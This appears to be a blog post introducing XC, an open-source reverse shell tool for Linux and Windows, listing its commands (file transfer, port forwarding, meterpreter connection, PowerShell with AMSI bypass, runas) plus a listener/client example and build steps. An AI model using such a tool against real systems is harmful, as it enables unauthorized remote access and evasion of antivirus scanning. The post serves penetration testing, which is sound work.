A powerful tool reminiscent of Netcat, designed for both Linux and Windows systems.
With its array of features including file manipulation, port forwarding, and plugin execution, XC offers versatile capabilities for penetration testers and ethical hackers.
This article provides a detailed overview and setup guide for leveraging XC’s functionalities effectively.
Netcat like reverse shell for Linux & Windows.
Usage:
└ Shared Commands: !exit
!upload <src> <dst>
* uploads a file to the target
!download <src> <dst>
* downloads a file from the target
!lfwd <localport> <remoteaddr> <remoteport>
* local portforwarding (like ssh -L)
!rfwd <remoteport> <localaddr> <localport>
* remote portforwarding (like ssh -R)
!lsfwd
* lists active forwards
!rmfwd <index>
* removes forward by index
!plugins
* lists available plugins
!plugin <plugin>
* execute a plugin
!spawn <port>
* spawns another client on the specified port
!shell
* runs /bin/sh
!runas <username> <password> <domain>
* restart xc with the specified user
!met <port>
* connects to a x64/meterpreter/reverse_tcp listener
└ OS Specific Commands:
!powershell
* starts powershell with AMSI Bypass
!rc <port>
* connects to a local bind shell and restarts this client over it
!runasps <username> <password> <domain>
* restart xc with the specified user using powershell
!vulns
* checks for common vulnerabilities
Usage:
└ Shared Commands: !exit
!upload <src> <dst>
* uploads a file to the target
!download <src> <dst>
* downloads a file from the target
!lfwd <localport> <remoteaddr> <remoteport>
* local portforwarding (like ssh -L)
!rfwd <remoteport> <localaddr> <localport>
* remote portforwarding (like ssh -R)
!lsfwd
* lists active forwards
!rmfwd <index>
* removes forward by index
!plugins
* lists available plugins
!plugin <plugin>
* execute a plugin
!spawn <port>
* spawns another client on the specified port
!shell
* runs /bin/sh
!runas <username> <password> <domain>
* restart xc with the specified user
!met <port>
* connects to a x64/meterpreter/reverse_tcp listener
└ OS Specific Commands:
!ssh <port>
* starts sshd with the configured keys on the specified port
rlwrap xc -l -p 1337
(Server)xc.exe 10.10.14.4 1337
(Client)xc_10.10.14.4_1337.exe
(Client)Make sure you are running golang version 1.15+, older versions will not compile. I tested it on ubuntu: go version go1.16.2 linux/amd64
and kali go version go1.15.9 linux/amd64
git clone --recurse-submodules https://github.com/xct/xc.git
GO111MODULE=off go get golang.org/x/sys/...
GO111MODULE=off go get golang.org/x/text/encoding/unicode
GO111MODULE=off go get github.com/hashicorp/yamux
GO111MODULE=off go get github.com/libp2p/go-reuseport
sudo apt-get install rlwrap upx
python3 build.py
Introduction to the Model Context Protocol (MCP) The Model Context Protocol (MCP) is an open…
While file extensions in Linux are optional and often misleading, the file command helps decode what a…
The touch command is one of the quickest ways to create new empty files or update timestamps…
Handling large numbers of files is routine for Linux users, and that’s where the find command shines.…
Managing files and directories is foundational for Linux workflows, and the mv (“move”) command makes it easy…
Creating directories is one of the earliest skills you'll use on a Linux system. The mkdir (make…